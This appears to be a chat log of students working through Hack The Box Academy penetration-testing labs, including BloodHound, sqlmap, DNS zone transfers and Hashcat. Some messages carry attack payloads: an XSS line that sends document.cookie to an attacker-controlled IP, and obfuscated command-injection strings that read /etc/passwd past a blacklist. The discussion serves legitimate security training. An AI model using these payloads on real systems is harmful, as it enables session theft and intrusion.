MATCH (obj1), (obj2) WHERE obj1.name = '<DOMAIN1>' AND obj2.name = '<DOMAIN2>' AND NOT obj1 = obj2 MATCH p = shortestPath((obj1)-[*..10]->(obj2)) RETURN p
im just confused about arth0s getting it with bloodhound-python lol
no luck
did you fill in the domain names
MATCH (obj1), (obj2) WHERE obj1.name = 'INLANEFREIGHT.LOCAL' AND obj2.name = 'FREIGHTLOGISTICS.LOCAL' AND NOT obj1 = obj2 MATCH p = shortestPath((obj1)-[*..10]->(obj2)) RETURN p
no luck
nothing showed?
nope
welp means it didn't get the trust at all then
what method did you use
bloodhound-python from the SSH instance?
or you pivoted
pivot with ligolo-ng
me 2
weirdo.
i installed it with pipx
found the problem
In Shells & Payloads, the skill assessment, were we supposed to be able to get the creds without the hints in the scenario? If so, how?
got the trusts thing to work for y'all?
i am studying this module right now
working with BH 4.3.0 with any ingestion method
4.3.1 no luck...
can i DM you?
nice, tried it on the pwnbox (bloodhound version 4.2.0) and it's worked just fine
so the issue was bloodhound it self? 4.2.0 on the pwnbox worked for me with multiple scan methods
🤷♂️ if it works, it works but testing a bunch of stuff just show me that the only version of SharpHound that doesn't get the trust is SharpHound v1.1.0 and the v2.x just doesn't want to work for some reason
oh i mean it doesn't want to run on the target for some reason (ldap errors)
unless you change trusts.py
yea, as a lot of people say if u can do it remotely from Linux just do it xD
what was the other common compatibility error?
im getting notes on all this BH stuff
This version of BloodHound.py is only compatible with BloodHound 4.2 or newer. For the 3.x range, use version 1.1.1 via pypi. As of version 1.3, BloodHound.py only supports Python 3, Python 2 is no longer tested and may break in the future.
oh this was
Hello guys
good afternoon
Have someone done advanced sql injection course
had you done advanced sql injection course
straight ahead I did:
|| sqlmap -u 'http://<IP>:<PORT>/*.php' --data='{"id":1}' --no-cast --random-agent --tamper=between --level=5 --risk=3 --schema ||
then:
||-D production -T final_flag ||
but I couldn't C the table content !!!!
after what U said I did:
||--dbs ||
got 2: || information_schema || & || production ||
then I did:
|| -D information_schema --tables || & || -D production --tables ||
got || final_fqag || did:
||-D production -T final_fqag || that did not exist but when I did again || production -T final_flag || got the table content
now I'm confused ...
was what I did at the start good (had a problem with the internet or a HTB bug) or did I need to do the DB enumeration to get some sort of permission??
is it time based? xd
me?
yes
I think it did ask me about it ...
but how does that make a difference?
time based sometimes misses some characters
well it didn't give me the whole content of the table ...
and I saw somewhere here that it happened to some other players ...
but when it went "by the order of enumeration" it showed me the content ...
so I don't understand what was the wrong thing here
i did, no luck
try rdate -n $DCIP
The last option is to prepend commands with faketime -f +7h or whatever the clock skew is
Only thing I can think of is if you were spoiling an active machine
I'm currently working on the Windows Priv Esc module, in the credential hunting section. The first question asks me to find a file with a password in it, I've found three different files with passwords in them. What appears to be the most obvious answer is a txt file in the htb-student documents directory. It doesn't appear to be the answer to the question. Is the question incorrect or do I keep looking for more possibilities?
thanks bro, it worked 🥰
Great!
What would be a good alternative to "evil-winrm"?
Writing your own
I'm "cleaning" and adding plans a, b and c for each tool in my toolboxes. That's the reason for the question 🙂
I'm serious, there is no alternative
^
can anyone help here?
guys i need help with POST JSON
who can help me?
"["London (UK) "]curl: (3) bad range in URL position 2:
[London (UK)]
∆
hello guys, on the LFI module, prevention section, second question: Edit the php.ini file to block system()
do i need to disable the system function
? I've been stuck here the whole day
got it guys thank you
Java is a beautiful island located between Sumatra and Bali
When it comes to the programming language, try it in #programming
if you have no access, then read and follow #welcome
I've gone over every line in the module twice and don't know where else to look, do you have any hints as to a direction
do you want to dm me the findstr command you are using
I love this response
I drank Java today - dark roast specifically.
The fact that they don't allow more than one public class in a file turns off my mind 💔
java...
va…
Why is everyone here dissing Java de Hutt
It's (not) just a meme
What's the first steps i should take if i wanna learn hacking?
hey, facing the same issue, already turned off realtime protection, still no luck
fix= start cmd as admin 🙂
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Nobody here is dissing Java. We like the island and the coffee
there is more than one user that can log in with smb. Make sure you have the right user. The name of the detected share will be a clue.
hey guys, anyone already finished the RDP and SOCKS Tunneling with SocksOverRDP module? i set everything up, the last step is to rdp into 172.16.6.155 from the pivot host but this is what i get
For Active Subdomain Enumeration I am working on the second problem where it states to Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. I believe I was able to find the answer with the command ||dig any axfr "inlanefreight.htb" @<target ip>||. When I finally got the results I saw these that looked weird, and assuming they were the zones I submitted them and it turned out to be right. I wanted to confirm if these were indeed the correct zones and if there is any other way to look for these.
|| ww02.inlanefreight.htb||
|| www1.inlanefreight.htb ||
Use either any or axfr. Both together make no sense.
Both "zones" are not correct as far as I remember
actually no, ||inlanefreight.htb|| is the one zone here and there is also a subdomain with its own records you need to do zone transfer on all the found subdomains to find the other zone
I used both because for some reason using them separately wasn’t giving me anything.
did you add domain and name server to the hosts file? if not do it and then try again
I did and when trying to run the command with just any or with -type axfr separate I was getting zone transfer fails
can you share a screenshot
The entry in the Hosts file only makes sense if you want to use the fqdn instead of the IP
True, the module teaches it that way so i just assumed, he followed the module
oh nvm, he was using ip
fixed it by deleting the domain in the command
Hello, for this I don't succeed in recovering the NTLMv2 hash, why?
Are you running powershell as admin?
Hello, I'm doing the Attacking Common Services: Attacking DNS and for the life of me can't figure out how to get the records. I've got all the subdomains but keep getting errors with dig and fierce
Is anyone able to help?
which one do you got
everyone 🫠
Unsure if you're still stuck, but I just got to SA and am (seemingly) in same position as you... And while the course did cover a (small) bit of file-uploads in the CSP bypasses, doesn't seem applicable in this case...
No worries, thank you, I’ll keep looking
@hidden trellis @fossil crescent DMing you.
How did you get it when I used the proxychains Firefox-est 172.x.x.x after setting everything up and it times out.
hello. is the academy's avatar changeable ?
No, I don't think so

Having an issue on the "Cracking Passwords with Hashcat" module. I download the zip, unzip the .cap file and have used both cap2hccapx and hcxpcaptool to the same result. Running Hashcat on the resulting .hccapx file returns several lines of "Separator unmatched" errors. Any hints on what i'm doing wrong here?
Sample of error:
Hashfile 'mic1.hccapx' on line 1 (HCPX): Separator unmatched
Hashfile 'mic1.hccapx' on line 2 ([unprintable bytes]): Separator unmatched
hey guys,
In module "Cross-Site Scripting (XSS)" ==>> "XSS Discovery"
in the use of "xsstrike" I don't C the difference between "stored xss" and "reflected xss"
when I used it on the exercise of "stored xss" I got the same result as I did when I did it in "reflected xss"
so I don't understand where should I C the result??
maybe someone can point out to me what I missed ...
=====
Hello guys, I am stuck at Local File Inclusion, at section Automated scanning. I did find the parameter to include, but I did not find any useful files to inject the payload into. Which file should I include?
Hello guys, I have a problem for this, what domain name must I use? Which user? and can I use raiseChild?
you can, but that's definitely not the right IP, it was an internal one starting with 172, you need a pivot first
oh ok so I don't change the command but I don't have passwd of htb-student_adm, so I just change with htb-student but it is not okay
student_adm is the correct account, password was given at some point, might be the same
If you are running a recent version of hashcat, this is sorta intentional
I've been looking for it desperately since last night. ^^"
We deprecated the hccapx format quite a while ago, no one should be using it anymore. If you are using mode 22000 you will need to use the new hash format
was this passwd found in one of the previous lessons?
I think it's the same as the regular student password, but it's not explicitly in my notes for that module
I tested it doesn't work unfortunately
For anyone doing the DOCUMENTATION & REPORTING module, the attack chain is supposed to be formatted into the findings section? As they are both different parts of the report. Both should be included.
hello, i don't understand the question To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above.
if someone can help me pls
it's the question of HyperText Transfer Protocol (HTTP)
What module is this?
i can prob look at it
web requests
thx
I don't understand what is a flag and how i can get it
and i don't understand which exercise they are talking about
Yo
So curl sends http requests the same as a Web browser does.
I'm not in a good mood
When you send a web request to the file they are mentioning you should be able to access its content through the terminal
This RETARD is tryna scam me, he hacked my old acc and it's inactive, he's saying his friend hacked it back, he's trying to get my playstation one but epic don't believe it's my og ACC and it's inactive and I have to pay to get it back but I can't
yes i succeed to get the content
it works the same as a web browser: you have to enter the server location and file you want to access in url format
cool!
but i don't understand what is a flag
if i write curl -O inlanefreight.com/index.html what does it represent
inlanefreight is a website but index.html ?
ok so i am registering inlanefreight code in index.html ?
so index.html is just a name i can put wiss213.html ?
mhmm
theoretically yes
However, you must then change the web server configuration so that it does not deliver index.html as the first document, but wiss213.html
a flag is a string of characters, usually stored in a txt file, to prove that you have achieved something
Yo who can teach me how to hack
but for example if i want to know the flag of index.html ?
it serves as a way to demonstrate you have access to a string of characters, the challenge becomes getting to that very place
If there is a flag there, it is either in the source code or on the page
it tends to be formatted as: HTB{<stringof characters>}
Anyone free to answer a question regarding identification of bad characters in the module Stack-Based Buffer Overflows on Windows x86 ?
curl -O inlanefreight.com/download.php
and i enter in download.php document
Is it the right beginning?
so, the exercise isn't about the inlanefreight server, but rather the one you spawn in the ending of the section
the problem is that i have nothing in the ending
so my end is
As the above message mentions, we may use --help all to print a more detailed help menu, or --help category (e.g. -h http) to print the detailed help of a specific flag. If we ever need to read more detailed documentation, we can use man curl to view the full cURL manual page.
In the upcoming sections, we will cover most of the above flags and see where we should use each of them.
A flag for a command is for example -h It often stands for help
ok
So it was really about differentiating between flag(target string) and flag(command edit) : |
yes
okey okey
so what i should do ?
what do you mean? xd
so does the question ask for a target string or a command edit?
a target string
ok
Can someone hack my og ACC back. Please I don't want to pay
yeye xd
To access the target string i should enter the document code
yes sir
so i should put curl -O server/FILE
yes
but i don't have the server
At the end of the sections there's a Target: <IP> part, thats the one they ask you to access
okkkkkkkkkkkkkkkkkkkkkkkkkkk
For 3 days i did not understand what the target is
i thought that it was for professionals, like a target to hack
no, it's all controlled environments, servers that htb provides to practice on
ok thxxxx
you'll see that inlanefreight appears multiple times as a made up company
ok thx
np, gl
read #rules
yeah
i think this is as far i can say xd
cool!
someone can help with "Cross-Site Scripting (XSS) " ==>> "Session Hijacking"
What exactly is not working?
maybe me .... 😵💫
I opened a server and entered all 5 ways they mentioned in the section in the inputs (nothing gave me a response)
I also tried to enter all inputs with the || new Image().src='http://OUR_IP/index.php?c='+document.cookie ||
also didn't get a response
I'm guessing I'm missing something but I don't understand what it is
First you have to read the source code to understand what exactly you have to enter in the field.
Then you need to find the field that allows XSS.
from what I saw I'm guessing I can use || <script src="script.js"></script> || since I C this|| <script src="script.js"></script> || in the source code
but when I'm using this it doesn't give me a response, as a matter of fact I used all 6 examples from the section and also didn't get a response
so I think it's something else I'm doing wrong...
Where exactly is your script located? That can't work
can I DM ?
sure
Heyoo, does someone know why the Domain is not needed for LINUX01$ with this keytab file? Is it only the hostname for computer accounts, without the domain? The keytab only works with "LINUX01$" thaaanks
I still haven't found the password to move forward here
Thanks for last time, i finally managed to finish this chapter after all 👍
we got wley's password in an earlier section
all the way back in LLMNR poisoning
you are supposed to take notes of every finding
finding/relevant information of the domain(s)
dollar sign is breaking your command
kinit 'LINUX01$@INLANEFREIGHT.LOCAL'
Hey guys , can I dm someone for help . I've been stuck on 'Attacking common services' assessments .
Hi everyone, I have a small question about the "COMMAND INJECTIONS" module "Bypassing Blacklisted Commands" the "Linux only" Part.
I'm trying to use the whoami / cat command with the " \ " to be able to bypass the command blacklist.
My aim is to be able to run "who\ami" for example using this payload who$(tr${IFS}'!-}'${IFS}'"-~'<<<[)ami . Problem: my shell interprets it as "who\ami" but I get a "command not found".
and if I run who\ami directly it works. I think this is due to the interpretation of the command, but if anyone could shed some light on this, that would be great.
if anyone would like to send me a DM to give me more information, I'm available.
thanks 🙏
Hello guys,
I'm currently stuck on the skill assessment, for the module "NTLM RELAY ATTACKS".
I have compromised the BACKUP01 server but I don't know what to do next.
I think i'm missing something, if anyone would like to send me a DM for a hint.
thanks!
if anyone can explain why this works in my shell bash<<<$(rev<<<'dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac') but this does not work in burp repeater `ip=127.0.0.1%0abash<<<$(rev<<<'dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac')`
specify dns with ip of dc with -ns
you probably need to url encode that
I'll give it a try, but what's strange is that the initial ping command works correctly, but the rest does not.
from experience, heavy obfuscation like this won't always work, and just because it works in your shell doesn't mean it will work elsewhere, could be the target's environment, the shell it's using, encoding problems, etc
I don't remember having to do this much for that module
Um , I see, in fact in the module it gives this tip: If you wanted to bypass a character filter with the above method, you'd have to invert them too, or include them when inverting the original command. And I wanted to try it
I've also tried a simple 'ls -al /home' but that doesn't work either.
is it also through burp?
yes, to explain my approach I do (for cat /etc/passwd) :
echo 'cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd' | rev
dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac
I tried on my shell
bash<<<$(rev<<<'dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac')
and I put it in burp
I do the same for 'ls -al /home'
the machine was just buggy after all, sorry, just reboot
but excuse me, I searched for a while in other courses and I can't find the password for this user to move forward with this exercise
literally the previous section
encode all special characters maybe, if you're using cyberchef, tick that option, you can also use the urlencode package, but again, it doesn't always work
can i ask question about Logrotate - LINUX PRIVILEGE ESCALATION module ??
Thank you, I'll try